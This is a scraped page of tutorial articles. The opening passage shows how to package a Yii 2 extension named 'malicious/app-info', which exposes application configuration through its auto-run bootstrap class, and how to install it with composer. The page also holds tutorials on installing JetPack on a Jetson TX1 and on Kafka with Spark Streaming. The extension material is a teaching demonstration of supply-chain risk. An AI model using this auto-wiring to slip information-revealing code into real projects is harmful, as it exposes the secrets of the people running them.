about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point in the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is to craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step. Preparing the correct composer.json manifest We first need a block with an identity. Have a look at the following lines of code: "name": "malicious/app-info","version": "1.0.0","description": "Example extension which reveals importantinformation about the application","keywords": ["yii2", "application-info", "example-extension"],"license": "CC-0", Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites: It is distributed from some version control system repository, such as the Git repository It has tags in this repository, correctly identifying the versions in the commit history And we do not want to bother with it right now. Next, we need to depend on the Yii 2 framework just in case. Normally, users will install the extension after the framework is already in place, but in the case of the extension already being listed in the require section of composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare dependency explicitly as follows: "require": {"yiisoft/yii2": "*"}, Then, we must provide the type as follows: "type": "yii2-extension", After this, for the Yii 2 extension installer, we have to provide two additional blocks; autoload will be used to correctly fill the alias section of the extension configuration. Have a look at the following code: "autoload": {"psr-4": {"malicious\": ""}}, What we basically mean is that our classes are laid out according to PSR-4 rules in such a way that the classes in the malicious namespace are placed right inside the root folder. The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration: "extra": {"bootstrap": "malicious\Bootstrap"}, Our manifest file is complete now. Commit everything to the version control system: $ git commit -a -m "Added the Composer manifest file to repo" Now, we'll add the tag at last, corresponding to the version we declared as follows: $ git tag 1.0.0 We already mentioned earlier the purpose for which we're doing this. All that's left is to tell the composer from where to fetch the extension contents. Configuring the repositories We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con: Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published In our case, where we are just in fact learning about how to install things using composer, we certainly do not want to make our extension public. Do not use Packagist for the extension example we are building in this article. Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application: $ php composer.phar require "malicious/app-info:*" After that, we should see something like the following screenshot after requesting the /app-info/configuration route: This corresponds to the following structure (the screenshot is from the http://jsonviewer.stack.hu/ web service): Put the extension to some public repository, for example, GitHub, and register a package at Packagist. This command will then work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left for us. The first option, which is perfectly suited to our learning cause, is to use the archived package directly. For this, you have to add the repositories section to composer.json in the code base of the application you want to add the extension to: "repositories": [// definitions of repositories for the packages required by thisapplication] To specify the repository for the package that should be installed from the ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them as an element of the repositories section, verbatim. This is the most complex way to set up the composer package requirement, but this way, you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of composer.json of the extension do not specify the actual location of the extension's files. You have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application: "repositories": [{"type": "package","package": {// … skipping whatever were copied verbatim from the composer.jsonof extension..."dist": {"url": "/home/vagrant/malicious.zip", // example filelocation"type": "zip"}}}] This way, we specify the location of the package in the filesystem of the same machine and tell the composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we have created for the extension, put them somewhere at the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself. After this, you run composer on the machine that really has this URL accessible (you can use http:// type of URLs, of course, too), and then you get the following response from composer: To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now: 'malicious/app-info' =>array ('name' => 'malicious/app-info','version' => '1.0.0.0','alias' =>array ('@malicious' => $vendorDir . '/malicious/app-info',),'bootstrap' => 'malicious\Bootstrap',), (The indentation was preserved as is from the actual file.) If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should. The pros and cons of the file-based installation are as follows: Pros Cons You can specify any file as long as it is reachable by some URL. The ZIP archive management capabilities exist on virtually any kind of platform today. There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication. You don't need to set up any version control system repository. It's of dubious benefit though. The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories, leaving only the dist and name sections there, because the Yii 2 installer will not be able to get to the autoloader and extra sections. The last method is to use the local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed here, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself. Now, we need to modify the target application's manifest to add the repositories section in the same way we did previously, but this time we will introduce a lot less code there: "repositories": [{"type": "git","url": "/home/vagrant/yii2-malicious/" // put your own URLhere}] All that's needed from you is to specify the correct URL to the Git repository of the extension we were preparing at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command: $ php composer.phar require "malicious/app-info:1.0.0" Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application. The pros and con of the repository-based installation are as follows: Pro: Relatively little code to write in the application's manifest. Pro: You don't need to really publish your extension (or the package in general). In some settings, it's really useful, for closed-source software, for example. Con: You still have to meddle with the manifest of the application itself, which can be out of your control and in this case, you'll have to guide your users about how to install your extension, which is not good for PR. In short, the following pieces inside the composer.json manifest turn the arbitrary composer package into the Yii 2 extension: First, we tell composer to use the special Yii 2 installer for packages as follows: "type": "yii2-extension" Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is as follows: "extra": {"bootstrap": "<Fully qualified name>"} Next, we tell the Yii 2 extension installer how to prepare aliases for your extension so that classes can be autoloaded as follows: "autoloader": {"psr-4": { "namespace": "<folder path>"}} Finally, we add the explicit requirement of the Yii 2 framework itself in the following code, so we'll be sure that the Yii 2 extension installer will be installed at all: "require": {"yiisoft/yii2": "*"} Everything else is the details of the installation of any other composer package, which you can read in the official composer documentation. Summary In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single composer invocation and can be automatically attached to the application afterwards. We learned that this required some level of integration between these two systems, Yii 2 and composer, and in turn this requires some additional preparation from you as a developer of the extension. We used a really silly, even a bit dangerous, example for extension. It was for three reasons: The extension was fun to make (we hope) We showed that using bootstrap mechanics, we can basically automatically wire up the pieces of the extension to the target application without any need for elaborate manual installation instructions We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and more than that, at each request made to the application We have discussed three methods of distribution of composer packages, which also apply to the Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service. In any other case, use the local repositories, as you can use both local filesystem paths and web URLs. We looked at the option to attach the extension completely manually, not using the composer installation at all. Resources for Article: Further resources on this subject: Yii: Adding Users and User Management to Your Site [Article] Meet Yii [Article] Yii 1.1: Using Zii Components [Article]
Read more
  • 0
  • 0
  • 7150

article-image-working-on-jetson-tx1-development-board-tutorial
Amrata Joshi
03 Mar 2019
11 min read
Save for later

Working on Jetson TX1 Development Board [Tutorial]

Amrata Joshi
03 Mar 2019
11 min read
When high-end visual computing and computer vision applications need to be deployed in real-life scenarios, then embedded development platforms are required, which can do computationally intensive tasks efficiently. Platforms such as Raspberry Pi can use OpenCV for computer vision applications and camera-interfacing capability, but it is very slow for real-time applications. Nvidia, which specializes in GPU manufacturing, has developed modules that use GPUs for computationally intensive tasks. These modules can be used to deploy computer vision applications on embedded platforms and include Jetson TK1, Jetson TX1, and Jetson TX2. Jetson TK1 is the preliminary board and contains 192 CUDA cores with the Nvidia Kepler GPU.  Jetson TX1 is intermediate in terms of processing speed, with 256 CUDA cores with Maxwell architecture, operating at 998 MHz along with ARM CPU. Jetson TX2 is highest in terms of processing speed and price. It comprises 256 CUDA cores with Pascal architecture operating at 1,300 MHz. This article is an excerpt taken from the book Hands-On GPU-Accelerated Computer Vision with OpenCV and CUDA. This book covers CUDA applications, threads, synchronization and memory, computer vision operations and more.  This article covers the Jetson TX1 Development Board, features and applications of the Jetson TX1 Development Board and basic requirements and steps to install JetPack on the Jetson TX1 Development Board. This article requires a good understanding of the Linux operating system (OS) and networking. It also requires any Nvidia GPU development board, such as Jetson TK1, TX1, or TX2. The JetPack installation file can be downloaded from Nvidia's official website. Jetson TX1 is a small system on a module developed specifically for demanding embedded applications. It is Linux-based and offers super-computing performance at the level of teraflops, which can be utilized for computer vision and deep learning applications. The Jetson TX1 module is shown in the following photograph: The size of the module is 50 x 87 mm, which makes it easy to integrate into any system. Nvidia also offers the Jetson TX1 Development Board, which houses this GPU for prototyping applications in a short amount of time. The whole development kit is shown in the following photograph: As can be seen from the photograph, apart from the GPU module, the development kit contains a camera module, USB ports, an Ethernet port, a heat sink, fan, and antennas. It is backed by a software ecosystem including JetPack, Linux for Tegra, CUDA Toolkit, cuDNN, OpenCV, and VisionWorks. This makes it ideal for developers who are doing research into deep learning and computer vision for rapid prototyping. The features of the Jetson TX1 development kit are explained in detail in the following section. Features of the Jetson TX1 The Jetson TX1 development kit has many features that make it ideal for super-computing tasks: It is a system on a chip built using 20 nm technology, and comprises an ARM Cortex A57 quad-core CPU operating at 1.73 GHz and a 256 core Maxwell GPU operating at 998 Mhz. It has 4 GB of DDR4 memory with a data bus of 64 bits working at a speed of 1,600 MHz, which is equivalent to 25.6 GB/s. It contains a 5 MP MIPI CSI-2 camera module. It supports up to six two lane or three four lane cameras at 1,220 MP/s. The development kit also has a normal USB 3.0 type A port and micro USB port for connecting a mouse, a keyboard, and USB cameras to the board. It also has an Ethernet port and Wi-Fi connectivity for network connection. It can be connected to an HDMI display device via the HDMI port. The kit contains a heat sink and a fan for cooling down the GPU device at its peak performance. It draws as little as 1 watt of power in an idle condition, around 8-10 watts under normal load, and up to 15 watts when the module is fully utilized. It can process 258 images/second with a power dissipation of 5.7 watts, which is equivalent to the performance/watt value of 45. A normal i7 CPU processor has a performance of 242 images/second at 62.5 watts, which is equivalent to a performance/watt value of 3.88. So Jetson TX1 is 11.5 times better than an i7 processor. Applications of Jetson TX1 Jetson TX1 can be used in many deep learning and computer vision applications that require computationally intensive tasks. Some of the areas and applications in which Jetson TX1 can be used are as follows: It can be used in building autonomous machines and self-driving cars for various computationally intensive tasks. It can be used in various computer vision applications such as object detection, classification, and segmentation. It can also be used in medical imaging for the analysis of MRI images and computed tomography (CT) images. It can be used to build smart video surveillance systems that can help in crime monitoring or traffic monitoring. It can be used in bioinformatics and computational chemistry for simulating DNA genes, sequencing, protein docking, and so on. It can be used in various defense equipment where fast computing is required. Installation of JetPack on Jetson TX1 The Jetson TX1 comes with a preinstalled Linux OS. The Nvidia drivers for it should be installed when it is booted for the first time. The commands to do it are as follows: cd ${HOME}/NVIDIA-INSTALLER sudo ./installer.sh When TX1 is rebooted after these two commands, the Linux OS with user interface will start. Nvidia offers a software development kit (SDK), which contains all of the software needed for building computer vision and deep learning applications, along with the target OS to flash the development board. This SDK is called JetPack. The latest JetPack contains Linux for Tegra (L4T) board support packages; TensorRT, which is used for deep learning inference in computer vision applications; the latest CUDA toolkit, cuDNN, which is a CUDA deep neural network library; VisionWorks, which is also used for computer vision and deep learning applications; and OpenCV. All of the packages will be installed by default when you install JetPack. This section describes the procedure to install JetPack on the board. The procedure is long, tedious, and a little bit complex for a newcomer to Linux. So, just follow the steps and screenshots given in the following section carefully. Basic requirements for installation There are a few basic requirements for the installation of JetPack on TX1. JetPack can't be installed directly on the board, so a PC or virtual machine that runs Ubuntu 14.04 is required as a host PC. The installation is not checked with the latest version of Ubuntu, but you are free to play around with it. The Jetson TX1 board needs peripherals such as a mouse, keyboard, and monitor, which can be connected to the USB and HDMI ports. The Jetson TX1 board should be connected to the same router as the host machine via an Ethernet cable. The installation will also require a micro USB to USB cable to connect the board with a PC for transferring packages on the board via serial transfer. Note down the IP address of the board by checking the router configuration. If all requirements are satisfied, then move to the following section for the installation of JetPack. Steps for installation This section describes the steps to install the latest JetPack version, accompanied by screenshots. All of the steps need to be executed on the host machine, which is running Ubuntu 14.04:  Download the latest JetPack version from the official Nvidia site by following the link, https://developer.nvidia.com/embedded/jetpack, and clicking on the download button, as shown in the following screenshot: JetPack 3.3 is used to demonstrate the installation procedure. The name of the downloaded file is JetPack-L4T-3.3-linux-x64_b39.run. Create a folder on Desktop named jetpack and copy this file in that folder, as shown in the following screenshot: Start a Terminal in that folder by right-clicking and selecting the Open option. The file needs to be executed, so it should have an execute permission. If that is not the case, change the permission and then start the installer, as shown in the screenshot: It will start an installation wizard for JetPack 3.3 as shown in the following screenshot. Just click on Next in this window: The wizard will ask for directories where the packages will be downloaded and installed. You can choose the current directory for installation and create a new folder in this directory for saving downloaded packages, as shown in the following screenshot. Then click on Next: The installation wizard will ask you to choose the development board on which the JetPack packages are to be installed. Select Jetson TX1, as shown in the following screenshot, and click on Next: The components manager window will be displayed, which shows which packages will be downloaded and installed. It will show packages such as CUDA Toolkit, cuDNN, OpenCV, and VisionWorks, along with the OS image, as shown in the following screenshot:  It will ask to accept the license agreement. So click on Accept all, as shown in the following screenshot, and click on Next: It will start to download the packages, as shown in the following screenshot: When all of the packages are downloaded and installed, click on Next to complete the installation on the host. It will display the following window: It will ask you to select a network layout of how the board is connected to the host PC. The board and host PC are connected to the same router, so the first option, which tells the device to access the internet via the same router or switch, is selected, as shown in the following screenshot, and then click Next: It will ask for the interface used to connect the board to the network. We have to use an Ethernet cable to connect the router to the board, so we will select the eth0 interface, as shown in the following screenshot: This will finish the installation on the host and it will show the summary of the packages that will be transferred and installed on the board. When you click Next in the window, it will show you the steps to connect the board to the PC via the micro USB to USB cable and to boot the board in Force USB Recovery Mode. The window with the steps are shown as follows: To go into force recovery mode, after pressing the POWER button, press the FORCE RECOVERY button and, while pressing it, press and release the RESET button. Then release the FORCE RECOVERY button. The device will boot in force recovery mode. Type the lsusb command in the window; it will start transferring packages on to the device if it is correctly connected. If you are using a virtual machine, then you have to enable the device from the USB settings of the virtual machine. Also, select USB 3.0 controller if it's not selected. The process that starts after typing the lsusb command is shown as follows: The process will flash the OS on the device. This process can take a long time, up to an hour to complete. It will ask for resetting the device after the flashing has completed an IP address for ssh. Write down the IP address noted earlier, along with the default username and password, which is ubuntu, and click Next. The following window will be displayed after that: Click on Next and it will push all packages, such as CUDA Toolkit, VisionWorks, OpenCV, and Multimedia, onto the device. The following window will be displayed: After the process is completed, it will ask whether to delete all the downloaded packages during the process. If you want to delete, then tick on the checkbox or keep it as it is, as shown in the following screenshot: Click on Next and the installation process will be finished. Reboot the Jetson TX1 Development Board and it will boot in the normal Ubuntu OS. You will also observe sample examples of all the packages that are installed. This article introduced the Jetson TX1 Development Board for deploying computer vision and deep learning applications on embedded platforms. It also covers features and applications of the Jetson TX1 Development Board and basic requirements and steps to install JetPack on the Jetson TX1 Development Board. To know more about Jetson TX1 and CUDA applications, check out the book  Hands-On GPU-Accelerated Computer Vision with OpenCV and CUDA. NVIDIA makes its new “brain for autonomous AI machines”, Jetson AGX Xavier Module, available for purchase NVIDIA announces pre-orders for the Jetson Xavier Developer Kit, an AI chip for autonomous machines, at $2,499 NVIDIA launches GeForce Now’s (GFN) ‘recommended router’ program to enhance the overall performance and experience of GFN
Read more
  • 0
  • 0
  • 7145
article-image-implementing-fault-tolerance-in-spark-streaming-data-processing-applications-with-apache-kafka
Pravin Dhandre
01 Feb 2018
16 min read
Save for later

Implementing fault-tolerance in Spark Streaming data processing applications with Apache Kafka

Pravin Dhandre
01 Feb 2018
16 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Rajanarayanan Thottuvaikkatumana titled Apache Spark 2 for Beginners. This book is a developer’s guide for developing large-scale and distributed data processing applications in their business environment. [/box] Data processing is generally carried in two ways, either in batch or stream processing. This article will help you learn how to start processing your data uninterruptedly and build fault-tolerance as and when the data gets generated in real-time Message queueing systems with publish-subscribe capability are generally used for processing messages. The traditional message queueing systems failed to perform because of the huge volume of messages to be processed per second for the needs of large-scale data processing applications. Kafka is a publish-subscribe messaging system used by many IoT applications to process a huge number of messages. The following capabilities of Kafka made it one of the most widely used messaging systems: Extremely fast: Kafka can process huge amounts of data by handling reading and writing in short intervals of time from many application clients Highly scalable: Kafka is designed to scale up and scale out to form a cluster using commodity hardware Persists a huge number of messages: Messages reaching Kafka topics are persisted into the secondary storage, while at the same time it is handling huge number of messages flowing through The following are some of the important elements of Kafka, and are terms to be understood before proceeding further: Producer: The real source of the messages, such as weather sensors or mobile phone network Broker: The Kafka cluster, which receives and persists the messages published to its topics by various producers Consumer: The data processing applications subscribed to the Kafka topics that consume the messages published to the topics The same log event processing application use case discussed in the preceding section is used again here to elucidate the usage of Kafka with Spark Streaming. Instead of collecting the log event messages from the TCP socket, here the Spark Streaming data processing application will act as a consumer of a Kafka topic and the messages published to the topic will be consumed. The Spark Streaming data processing application uses the version 0.8.2.2 of Kafka as the message broker, and the assumption is that the reader has already installed Kafka, at least in a standalone mode. The following activities are to be performed to make sure that Kafka is ready to process the messages produced by the producers and that the Spark Streaming data processing application can consume those messages: Start the Zookeeper that comes with Kafka installation. Start the Kafka server. Create a topic for the producers to send the messages to. Pick up one Kafka producer and start publishing log event messages to the newly created topic. Use the Spark Streaming data processing application to process the log eventspublished to the newly created topic. Starting Zookeeper and Kafka The following scripts are run from separate terminal windows in order to start Zookeeper and the Kafka broker, and to create the required Kafka topics: $ cd $KAFKA_HOME $ $KAFKA_HOME/bin/zookeeper-server-start.sh $KAFKA_HOME/config/zookeeper.properties [2016-07-24 09:01:30,196] INFO binding to port 0.0.0.0/0.0.0.0:2181 (org.apache.zookeeper.server.NIOServerCnxnFactory) $ $KAFKA_HOME/bin/kafka-server-start.sh $KAFKA_HOME/config/server.properties [2016-07-24 09:05:06,381] INFO 0 successfully elected as leader (kafka.server.ZookeeperLeaderElector) [2016-07-24 09:05:06,455] INFO [Kafka Server 0], started (kafka.server.KafkaServer) $ $KAFKA_HOME/bin/kafka-topics.sh --create --zookeeper localhost:2181 -- replication-factor 1 --partitions 1 --topic sfb Created topic "sfb". $ $KAFKA_HOME/bin/kafka-console-producer.sh --broker-list localhost:9092 -- topic sfb The Kafka message producer can be any application capable of publishing messages to the Kafka topics. Here, the kafka-console-producer that comes with Kafka is used as the producer of choice. Once the producer starts running, whatever is typed into its console window will be treated as a message that is published to the chosen Kafka topic. The Kafka topic is given as a command line argument when starting the kafka-console-producer. The submission of the Spark Streaming data processing application that consumes log event messages produced by the Kafka producer is slightly different from the application covered in the preceding section. Here, many Kafka jar files are required for the data processing. Since they are not part of the Spark infrastructure, they have to be submitted to the Spark cluster. The following jar files are required for the successful running of this application: $KAFKA_HOME/libs/kafka-clients-0.8.2.2.jar $KAFKA_HOME/libs/kafka_2.11-0.8.2.2.jar $KAFKA_HOME/libs/metrics-core-2.2.0.jar $KAFKA_HOME/libs/zkclient-0.3.jar Code/Scala/lib/spark-streaming-kafka-0-8_2.11-2.0.0-preview.jar Code/Python/lib/spark-streaming-kafka-0-8_2.11-2.0.0-preview.jar In the preceding list of jar files, the maven repository co-ordinate for spark-streamingkafka-0-8_2.11-2.0.0-preview.jar is "org.apache.spark" %% "sparkstreaming-kafka-0-8" % "2.0.0-preview". This particular jar file has to be downloaded and placed in the lib folder of the directory structure given in Figure 4. It is being used in the submit.sh and the submitPy.sh scripts, which submit the application to the Spark cluster. The download URL for this jar file is given in the reference section of this chapter. In the submit.sh and submitPy.sh files, the last few lines contain a conditional statement looking for the second parameter value of 1 to identify this application and ship the required jar files to the Spark cluster. Implementing the application in Scala The following code snippet is the Scala code for the log event processing application that processes the messages produced by the Kafka producer. The use case of this application is the same as the one discussed in the preceding section concerning windowing operations: /** The following program can be compiled and run using SBT Wrapper scripts have been provided with this The following script can be run to compile the code ./compile.sh The following script can be used to run this application in Spark. The  second command line argument of value 1 is very important. This is to flag the shipping of the kafka jar files to the Spark cluster ./submit.sh com.packtpub.sfb.KafkaStreamingApps 1 **/ package com.packtpub.sfb import java.util.HashMap import org.apache.spark.streaming._ import org.apache.spark.sql.{Row, SparkSession} import org.apache.spark.streaming.kafka._ import org.apache.kafka.clients.producer.{ProducerConfig, KafkaProducer, ProducerRecord} object KafkaStreamingApps { def main(args: Array[String]) { // Log level settings LogSettings.setLogLevels() // Variables used for creating the Kafka stream //The quorum of Zookeeper hosts val zooKeeperQuorum = "localhost" // Message group name val messageGroup = "sfb-consumer-group" //Kafka topics list separated by coma if there are multiple topics to be listened on val topics = "sfb" //Number of threads per topic val numThreads = 1 // Create the Spark Session and the spark context val spark = SparkSession .builder .appName(getClass.getSimpleName) .getOrCreate() // Get the Spark context from the Spark session for creating the streaming context val sc = spark.sparkContext // Create the streaming context val ssc = new StreamingContext(sc, Seconds(10)) // Set the check point directory for saving the data to recover when there is a crash ssc.checkpoint("/tmp") // Create the map of topic names val topicMap = topics.split(",").map((_, numThreads.toInt)).toMap // Create the Kafka stream val appLogLines = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, topicMap).map(_._2) // Count each log messge line containing the word ERROR val errorLines = appLogLines.filter(line => line.contains("ERROR")) // Print the line containing the error errorLines.print() // Count the number of messages by the windows and print them errorLines.countByWindow(Seconds(30), Seconds(10)).print() // Start the streaming ssc.start() // Wait till the application is terminated ssc.awaitTermination() } } Compared to the Scala code in the preceding section, the major difference is in the way the stream is created. Implementing the application in Python The following code snippet is the Python code for the log event processing application that processes the message produced by the Kafka producer. The use case of this application is also the same as the one discussed in the preceding section concerning windowing operations: # The following script can be used to run this application in Spark # ./submitPy.sh KafkaStreamingApps.py 1 from __future__ import print_function import sys from pyspark import SparkContext from pyspark.streaming import StreamingContext from pyspark.streaming.kafka import KafkaUtils if __name__ == "__main__": # Create the Spark context sc = SparkContext(appName="PythonStreamingApp") # Necessary log4j logging level settings are done log4j = sc._jvm.org.apache.log4j log4j.LogManager.getRootLogger().setLevel(log4j.Level.WARN) # Create the Spark Streaming Context with 10 seconds batch interval ssc = StreamingContext(sc, 10) # Set the check point directory for saving the data to recover when there is a crash ssc.checkpoint("tmp") # The quorum of Zookeeper hosts zooKeeperQuorum="localhost" # Message group name messageGroup="sfb-consumer-group" # Kafka topics list separated by coma if there are multiple topics to be listened on topics = "sfb" # Number of threads per topic numThreads = 1 # Create a Kafka DStream kafkaStream = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, {topics: numThreads}) # Create the Kafka stream appLogLines = kafkaStream.map(lambda x: x[1]) # Count each log messge line containing the word ERROR errorLines = appLogLines.filter(lambda appLogLine: "ERROR" in appLogLine) # Print the first ten elements of each RDD generated in this DStream to the console errorLines.pprint() errorLines.countByWindow(30,10).pprint() # Start the streaming ssc.start() # Wait till the application is terminated ssc.awaitTermination() The following commands are run on the terminal window to run the Scala application: $ cd Scala $ ./submit.sh com.packtpub.sfb.KafkaStreamingApps 1 The following commands are run on the terminal window to run the Python application: $ cd Python $ ./submitPy.sh KafkaStreamingApps.py 1 When both of the preceding programs are running, whatever log event messages are typed into the console window of the Kafka console producer, and invoked using the following command and inputs, will be processed by the application. The outputs of this program will be very similar to the ones that are given in the preceding section: $ $KAFKA_HOME/bin/kafka-console-producer.sh --broker-list localhost:9092 -- topic sfb [Fri Dec 20 01:46:23 2015] [ERROR] [client 1.2.3.4.5.6] Directory index forbidden by rule: /home/raj/ [Fri Dec 20 01:46:23 2015] [WARN] [client 1.2.3.4.5.6] Directory index forbidden by rule: /home/raj/ [Fri Dec 20 01:54:34 2015] [ERROR] [client 1.2.3.4.5.6] Directory index forbidden by rule: /apache/web/test Spark provides two approaches to process Kafka streams. The first one is the receiver-based approach that was discussed previously and the second one is the direct approach. This direct approach to processing Kafka messages is a simplified method in which Spark Streaming is using all the possible capabilities of Kafka just like any of the Kafka topic consumers, and polls for the messages in the specific topic, and the partition by the offset number of the messages. Depending on the batch interval of the Spark Streaming data processing application, it picks up a certain number of offsets from the Kafka cluster, and this range of offsets is processed as a batch. This is highly efficient and ideal for processing messages with a requirement to have exactly-once processing. This method also reduces the Spark Streaming library's need to do additional work to implement the exactly-once semantics of the message processing and delegates that responsibility to Kafka. The programming constructs of this approach are slightly different in the APIs used for the data processing. Consult the appropriate reference material for the details. The preceding sections introduced the concept of a Spark Streaming library and discussed some of the real-world use cases. There is a big difference between Spark data processing applications developed to process static batch data and those developed to process dynamic stream data in a deployment perspective. The availability of data processing applications to process a stream of data must be constant. In other words, such applications should not have components that are single points of failure. The following section is going to discuss this topic. Spark Streaming jobs in production When a Spark Streaming application is processing the incoming data, it is very important to have uninterrupted data processing capability so that all the data that is getting ingested is processed. In business-critical streaming applications, most of the time missing even one piece of data can have a huge business impact. To deal with such situations, it is important to avoid single points of failure in the application infrastructure. From a Spark Streaming application perspective, it is good to understand how the underlying components in the ecosystem are laid out so that the appropriate measures can be taken to avoid single points of failure. A Spark Streaming application deployed in a cluster such as Hadoop YARN, Mesos or Spark Standalone mode has two main components very similar to any other type of Spark application: Spark driver: This contains the application code written by the user Executors: The executors that execute the jobs submitted by the Spark driver But the executors have an additional component called a receiver that receives the data getting ingested as a stream and saves it as blocks of data in memory. When one receiver is receiving the data and forming the data blocks, they are replicated to another executor for fault-tolerance. In other words, in-memory replication of the data blocks is done onto a different executor. At the end of every batch interval, these data blocks are combined to form a DStream and sent out for further processing downstream. Figure 1 depicts the components working together in a Spark Streaming application infrastructure deployed in a cluster: In Figure 1, there are two executors. The receiver component is deliberately not displayed in the second executor to show that it is not using the receiver and instead just collects the replicated data blocks from the other executor. But when needed, such as on the failure of the first executor, the receiver in the second executor can start functioning. Implementing fault-tolerance in Spark Streaming data processing applications Spark Streaming data processing application infrastructure has many moving parts. Failures can happen to any one of them, resulting in the interruption of the data processing. Typically failures can happen to the Spark driver or the executors. When an executor fails, since the replication of data is happening on a regular basis, the task of receiving the data stream will be taken over by the executor on which the data was getting replicated. There is a situation in which when an executor fails, all the data that is unprocessed will be lost. To circumvent this problem, there is a way to persist the data blocks into HDFS or Amazon S3 in the form of write-ahead logs. When the Spark driver fails, the driven program is stopped, all the executors lose connection, and they stop functioning. This is the most dangerous situation. To deal with this situation, some configuration and code changes are necessary. The Spark driver has to be configured to have an automatic driver restart, which is supported by the cluster managers. This includes a change in the Spark job submission method to have the cluster mode in whichever may be the cluster manager. When a restart of the driver happens, to start from the place when it crashed, a checkpointing mechanism has to be implemented in the driver program. This has already been done in the code samples that are used. The following lines of code do that job: ssc = StreamingContext(sc, 10) ssc.checkpoint("tmp") From an application coding perspective, the way the StreamingContext is created is slightly different. Instead of creating a new StreamingContext every time, the factory method getOrCreate of the StreamingContext is to be used with a function, as shown in the following code segment. If that is done, when the driver is restarted, the factory method will check the checkpoint directory to see whether an earlier StreamingContext was in use, and, if found in the checkpoint data, it is created. Otherwise, a new StreamingContext is created. The following code snippet gives the definition of a function that can be used with the getOrCreate factory method of the StreamingContext. As mentioned earlier, a detailed treatment of these aspects is beyond the scope of this book: /** * The following function has to be used when the code is being restructured to have checkpointing and driver recovery * The way it should be used is to use the StreamingContext.getOrCreate with this function and do a start of that */ def sscCreateFn(): StreamingContext = { // Variables used for creating the Kafka stream // The quorum of Zookeeper hosts val zooKeeperQuorum = "localhost" // Message group name val messageGroup = "sfb-consumer-group" //Kafka topics list separated by coma if there are multiple topics to be listened on val topics = "sfb" //Number of threads per topic val numThreads = 1 // Create the Spark Session and the spark context val spark = SparkSession .builder .appName(getClass.getSimpleName) .getOrCreate() // Get the Spark context from the Spark session for creating the streaming context val sc = spark.sparkContext // Create the streaming context val ssc = new StreamingContext(sc, Seconds(10)) // Create the map of topic names val topicMap = topics.split(",").map((_, numThreads.toInt)).toMap // Create the Kafka stream val appLogLines = KafkaUtils.createStream(ssc, zooKeeperQuorum, messageGroup, topicMap).map(_._2) // Count each log messge line containing the word ERROR val errorLines = appLogLines.filter(line => line.contains("ERROR")) // Print the line containing the error errorLines.print() // Count the number of messages by the windows and print them errorLines.countByWindow(Seconds(30), Seconds(10)).print() // Set the check point directory for saving the data to recover when there is a crash ssc.checkpoint("/tmp") // Return the streaming context ssc } At a data source level, it is a good idea to build parallelism for faster data processing and, depending on the source of data, this can be accomplished in different ways. Kafka inherently supports partition at the topic level, and that kind of scaling out mechanism supports a good amount of parallelism. As a consumer of Kafka topics, the Spark Streaming data processing application can have multiple receivers by creating multiple streams, and the data generated by those streams can be combined by the union operation on the Kafka streams. The production deployment of Spark Streaming data processing applications is to be done purely based on the type of application that is being used. Some of the guidelines given previously are just introductory and conceptual in nature. There is no silver bullet approach to solving production deployment problems, and they have to evolve along with the application development. To summarize, we looked at the production deployment of Spark Streaming data processing applications and the possible ways of implementing fault-tolerance in Spark Streaming and data processing applications using Kafka. To explore more critical and equally important Spark tools such as Spark GraphX, Spark MLlib, DataFrames etc, do check out Apache Spark 2 for Beginners  to develop efficient large-scale applications with Apache Spark.  
Read more
  • 0
  • 0
  • 7145

article-image-administrating-mysql-server-phpmyadmin
Packt
13 Oct 2010
8 min read
Save for later

Administrating the MySQL Server with phpMyAdmin

Packt
13 Oct 2010
8 min read
